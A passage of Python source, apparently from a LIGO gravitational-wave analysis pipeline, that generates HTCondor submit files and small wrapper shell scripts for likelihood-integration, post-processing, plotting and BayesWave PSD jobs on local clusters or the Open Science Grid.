ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_ILE_sub_simple(tag='integrate', exe=None, log_dir=None, use_eos=False,simple_unique=False,ncopies=1,arg_str=None,request_memory=4096,request_gpu=False,request_disk=False,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,use_simple_osg_requirements=False,singularity_image=None,use_cvmfs_frames=False,frames_dir=None,cache_file=None,fragile_hold=False,max_runtime_minutes=None,condor_commands=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
if use_singularity and (singularity_image == None) :
print(" FAIL : Need to specify singularity_image to use singularity ")
sys.exit(0)
if use_singularity and (frames_dir == None) and (cache_file == None) :
print(" FAIL : Need to specify frames_dir or cache_file to use singularity (at present) ")
sys.exit(0)
if use_singularity and (transfer_files == None) :
print(" FAIL : Need to specify transfer_files to use singularity at present! (we will append the prescript; you should transfer any PSDs as well as the grid file ")
sys.exit(0)
exe = exe or which("integrate_likelihood_extrinsic")
frames_local = None
if use_singularity:
path_split = exe.split("/")
print((" Executable: name breakdown ", path_split, " from ", exe))
singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
if 'SINGULARITY_BASE_EXE_DIR' in list(os.environ.keys()) :
singularity_base_exe_path = os.environ['SINGULARITY_BASE_EXE_DIR']
else:
# singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
singularity_base_exe_path = "/usr/bin/" # should not hardcode this ...!
exe=singularity_base_exe_path + path_split[-1]
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
elif use_osg: # NOT using singularity!
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
path_split = exe.split("/")
exe=path_split[-1] # pull out basename
exe_here = 'my_wrapper.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ['../my_wrapper.sh']
with open(exe_here,'w') as f:
f.write("#! /bin/bash \n")
f.write(r"""
#!/bin/bash
# Modules and scripts run directly from repository
# Note the repo and branch are self-referential ! Not a robust solution long-term
# Exit on failure:
# set -e
export INSTALL_DIR=research-projects-RIT
export ILE_DIR=${INSTALL_DIR}/MonteCarloMarginalizeCode/Code
export PATH=${PATH}:${ILE_DIR}
export PYTHONPATH=${PYTHONPATH}:${ILE_DIR}
export GW_SURROGATE=gwsurrogate
git clone https://git.ligo.org/richard-oshaughnessy/research-projects-RIT.git
pushd ${INSTALL_DIR}
git checkout temp-RIT-Tides-port_master-GPUIntegration
popd
ls
cat local.cache
echo Starting ...
./research-projects-RIT/MonteCarloMarginalizeCode/Code/""" + exe + " $@ \n")
os.system("chmod a+x "+exe_here)
exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
if simple_unique:
uniq_str = "$(macroevent)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
if cache_file:
ile_job.add_opt("cache-file",cache_file)
ile_job.add_var_opt("event")
if not use_osg:
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
if not(request_disk is False):
ile_job.add_condor_cmd('request_disk', str(request_disk))
nGPUs =0
if request_gpu:
nGPUs=1
ile_job.add_condor_cmd('request_GPUs', str(nGPUs))
if use_singularity:
# Compare to https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('request_CPUs', str(1))
ile_job.add_condor_cmd('transfer_executable', 'False')
ile_job.add_condor_cmd("+SingularityBindCVMFS", 'True')
ile_job.add_condor_cmd("+SingularityImage", '"' + singularity_image + '"')
requirements = []
requirements.append("HAS_SINGULARITY=?=TRUE")
# if not(use_simple_osg_requirements):
# requirements.append("HAS_CVMFS_LIGO_CONTAINERS=?=TRUE")
#ile_job.add_condor_cmd("requirements", ' (IS_GLIDEIN=?=True) && (HAS_LIGO_FRAMES=?=True) && (HAS_SINGULARITY=?=TRUE) && (HAS_CVMFS_LIGO_CONTAINERS=?=TRUE)')
if use_cvmfs_frames:
requirements.append("HAS_LIGO_FRAMES=?=TRUE")
ile_job.add_condor_cmd('use_x509userproxy','True')
if 'X509_USER_PROXY' in list(os.environ.keys()):
print(" Storing copy of X509 user proxy -- beware expiration! ")
cwd = os.getcwd()
fname_proxy = cwd +"/my_proxy" # this can get overwritten, that's fine - just renews, feature not bug
os.system("cp ${X509_USER_PROXY} " + fname_proxy)
# ile_job.add_condor_cmd('x509userproxy',os.environ['X509_USER_PROXY'])
ile_job.add_condor_cmd('x509userproxy',fname_proxy)
if use_osg:
if not(use_simple_osg_requirements):
requirements.append("IS_GLIDEIN=?=TRUE")
# avoid black-holing jobs to specific machines that consistently fail. Uses history attribute for ad
ile_job.add_condor_cmd('periodic_release','(HoldReasonCode == 45) && (HoldReasonSubCode == 0)')
ile_job.add_condor_cmd('job_machine_attrs','Machine')
ile_job.add_condor_cmd('job_machine_attrs_history_length','4')
# for indx in [1,2,3,4]:
# requirements.append("TARGET.GLIDEIN_ResourceName=!=MY.MachineAttrGLIDEIN_ResourceName{}".format(indx))
if "OSG_DESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+DESIRED_SITES',os.environ["OSG_DESIRED_SITES"])
if "OSG_UNDESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+UNDESIRED_SITES',os.environ["OSG_UNDESIRED_SITES"])
# Some options to automate restarts, acts on top of RETRY in dag
if fragile_hold:
ile_job.add_condor_cmd("periodic_release","(NumJobStarts < 5) && ((CurrentTime - EnteredCurrentStatus) > 600)")
ile_job.add_condor_cmd("on_exit_hold","(ExitBySignal == True) || (ExitCode != 0)")
if use_singularity or use_osg:
# Set up file transfer options
ile_job.add_condor_cmd("when_to_transfer_output",'ON_EXIT')
# Stream log info
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
# Create prescript command to set up local.cache, only if frames are needed
# if we have CVMFS frames, we should be copying local.cache over directly, with it already populated !
if not(frames_local is None) and not(use_cvmfs_frames): # should be required for singularity or osg
try:
lalapps_path2cache=os.environ['LALAPPS_PATH2CACHE']
except KeyError:
print("Variable LALAPPS_PATH2CACHE is unset, assume default lalapps_path2cache is appropriate")
lalapps_path2cache="lalapps_path2cache"
cmdname = 'ile_pre.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ["../ile_pre.sh", frames_dir] # assuming default working directory setup
with open(cmdname,'w') as f:
f.write("#! /bin/bash -xe \n")
f.write( "ls "+frames_local+" | {lalapps_path2cache} 1> local.cache \n".format(lalapps_path2cache=lalapps_path2cache)) # Danger: need user to correctly specify local.cache directory
# Rewrite cache file to use relative paths, not a file:// operation
f.write(" cat local.cache | awk '{print $1, $2, $3, $4}' > local_stripped.cache \n")
f.write("for i in `ls " + frames_local + "`; do echo "+ frames_local + "/$i; done > base_paths.dat \n")
f.write("paste local_stripped.cache base_paths.dat > local_relative.cache \n")
f.write("cp local_relative.cache local.cache \n")
os.system("chmod a+x ile_pre.sh")
ile_job.add_condor_cmd('+PreCmd', '"ile_pre.sh"')
# if use_osg:
# ile_job.add_condor_cmd("+OpenScienceGrid",'True')
if use_cvmfs_frames:
transfer_files += ["../local.cache"]
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
if not transfer_files is None:
if not isinstance(transfer_files, list):
fname_str=transfer_files
else:
fname_str = ','.join(transfer_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_input_files', fname_str)
ile_job.add_condor_cmd('should_transfer_files','YES')
if not transfer_output_files is None:
if not isinstance(transfer_output_files, list):
fname_str=transfer_output_files
else:
fname_str = ','.join(transfer_output_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_output_files', fname_str)
# Periodic remove: kill jobs running longer than max runtime
# https://stackoverflow.com/questions/5900400/maximum-run-time-in-condor
if not(max_runtime_minutes is None):
remove_str = 'JobStatus =?= 2 && (CurrentTime - JobStartDate) > ( {})'.format(60*max_runtime_minutes)
ile_job.add_condor_cmd('periodic_remove', remove_str)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
if condor_commands is not None:
for cmd, value in condor_commands.iteritems():
ile_job.add_condor_cmd(cmd, value)
return ile_job, ile_sub_name
def write_consolidate_sub_simple(tag='consolidate', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_ILEdagPostprocess.sh")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
ile_job.add_arg(base) # what directory to load
ile_job.add_arg(target) # where to put the output (label), in CWD
#
# NO OPTIONS
#
# arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
# arg_str = arg_str.lstrip('-')
# ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
def write_unify_sub_simple(tag='unify', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_CleanILE.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# Write unify.sh
# - problem of globbing inside condor commands
# - problem that *.composite files from intermediate results will generally NOT be present
cmdname ='unify.sh'
base_str = ''
if not (base is None):
base_str = ' ' + base +"/"
with open(cmdname,'w') as f:
f.write("#! /usr/bin/env bash\n")
f.write( "ls " + base_str+"*.composite 1>&2 \n") # write filenames being concatenated to stderr
f.write( exe + base_str+ "*.composite \n")
st = os.stat(cmdname)
import stat
os.chmod(cmdname, st.st_mode | stat.S_IEXEC)
ile_job = pipeline.CondorDAGJob(universe=universe, executable=base_str+cmdname) # force full prefix
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
# ile_job.add_arg('*.composite') # what to do
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convert_sub(tag='convert', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'convert' job
convert_output_format_ile2inference
"""
exe = exe or which("convert_output_format_ile2inference") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_arg(file_input)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_test_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,universe="target",arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a convergence test job
"""
exe = exe or which("convergence_test_samples.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("samples " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_plot_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a final plot. Note the user can in principle specify several samples (e.g., several iterations, if we want to diagnose them)
"""
exe = exe or which("plot_posterior_corner.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
# ile_job.add_opt("samples",name) # do not add in usual fashion, because otherwise the key's value is overwritten
ile_job.add_opt("posterior-file " + name,'')
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_init_sub(tag='gridinit', exe=None,arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a grid initialization job.
Note this routine MUST create whatever files are needed by the ILE iteration
"""
exe = exe or which("util_ManualOverlapGrid.py")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_monoblock(tag='PSD_BW_mono', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,universe='local',no_grid=False,**kwargs):
"""
Write a submit file for constructing the PSD using BW
Modern argument syntax for BW
Note that *all ifo-specific results must be set outside this loop*, to work sensibly, and passed as an argument
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for BW
"""
exe = exe or which("BayesWave")
if exe is None:
print(" BayesWave not available, hard fail ")
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Loop over IFOs
# You should only have one, in the workflow for which this is intended
# Problem:
ile_job.add_arg("$(macroargument0)")
#
# Add mandatory options
ile_job.add_opt('Niter', '1000100')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Dmax', '200') # limit number of dimensions in model
ile_job.add_opt('resume', '')
ile_job.add_opt('progress', '')
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('psdlength', str(psd_length))
ile_job.add_opt('srate', str(srate))
ile_job.add_opt('outputDir', 'output_$(ifo)')
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_psd_sub_BW_step1(tag='PSD_BW_post', exe=None, log_dir=None, ncopies=1,arg_str=None,request_memory=4096,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,singularity_image=None,frames_dir=None,cache_file=None,channel_dict=None,psd_length=4,srate=4096,data_start_time=None,event_time=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
- channel_dict['H1'] = [channel_name, flow_ifo]
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("BayesWavePost")
if exe is None:
print(" BayesWavePost not available, hard fail ")
import sys
sys.exit(0)
frames_local = None
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add mandatory options
ile_job.add_opt('checkpoint', '')
ile_job.add_opt('bayesLine', '')
ile_job.add_opt('cleanOnly', '')
ile_job.add_opt('updateGeocenterPSD', '')
ile_job.add_opt('Nchain', '20')
ile_job.add_opt('Niter', '4000000')
ile_job.add_opt('Nbayesline', '2000')
ile_job.add_opt('dataseed', '1234') # make reproducible
ile_job.add_opt('trigtime', str(event_time))
ile_job.add_opt('psdstart', str(event_time-(psd_length-2)))
ile_job.add_opt('segment-start', str(event_time-(psd_length-2)))
ile_job.add_opt('seglen', str(psd_length))
ile_job.add_opt('srate', str(srate))
#
# Loop over IFOs
# Not needed, can do one job per PSD
# ile_job.add_opt("ifo","$(ifo)")
# ile_job.add_opt("$(ifo)-cache",cache_file)
for ifo in channel_dict:
channel_name, channel_flow = channel_dict[ifo]
ile_job.add_arg("--ifo "+ ifo) # need to prevent overwriting!
ile_job.add_opt(ifo+"-channel", ifo+":"+channel_name)
ile_job.add_opt(ifo+"-cache", cache_file)
ile_job.add_opt(ifo+"-flow", str(channel_flow))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
